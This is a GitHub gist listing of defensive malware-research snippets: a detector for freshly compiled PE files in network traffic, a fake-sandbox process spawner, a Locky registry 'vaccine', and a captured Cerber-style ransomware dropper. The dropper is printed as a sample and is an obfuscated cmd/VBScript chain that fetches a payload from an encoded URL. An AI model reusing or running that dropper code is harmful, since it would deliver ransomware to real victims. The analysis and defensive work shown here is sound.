x0rz
/ detect_fresh_pe.py
Created
July 20, 2016 12:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import datetime | |
| import os | |
| import sys | |
| import pefile | |
| from scapy.all import * | |
| import scapy_http.http | |
| import tempfile | |
| TIME_THRESHOLD = datetime.timedelta(days=3) |
x0rz
/ dropper.INFECTED.bat
Created
May 10, 2016 12:48
Command line execution acting as a dropper - found inside a malicious document (probably cerber ransomware)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT |
x0rz
/ fake_sandbox.ps1
Created
April 14, 2016 13:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simulate fake processes of analysis sandbox/VM that some malware will try to evade | |
| # This just spawn ping.exe with different names (wireshark.exe, vboxtray.exe, ...) | |
| # It's just a PoC and it's ugly as f*ck but hey, if it works... | |
| # Usage: .\fake_sandbox.ps1 -action {start,stop} | |
| param([Parameter(Mandatory=$true)][string]$action) | |
| $fakeProcesses = @("wireshark.exe", "vmacthlp.exe", "VBoxService.exe", | |
| "VBoxTray.exe", "procmon.exe", "ollydbg.exe", "vmware-tray.exe", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create registry Key | |
| New-Item -Path "HKCU:\Software\Locky" -ItemType Key | |
| # Setting ACL | |
| $a = whoami | |
| $acl = Get-Acl HKCU:\SOFTWARE\Locky | |
| $rule = New-Object System.Security.AccessControl.RegistryAccessRule ($a,"FullControl","Deny") | |
| $acl.SetAccessRule($rule) | |
| $acl | Set-Acl -Path HKCU:\SOFTWARE\Locky |
NewerOlder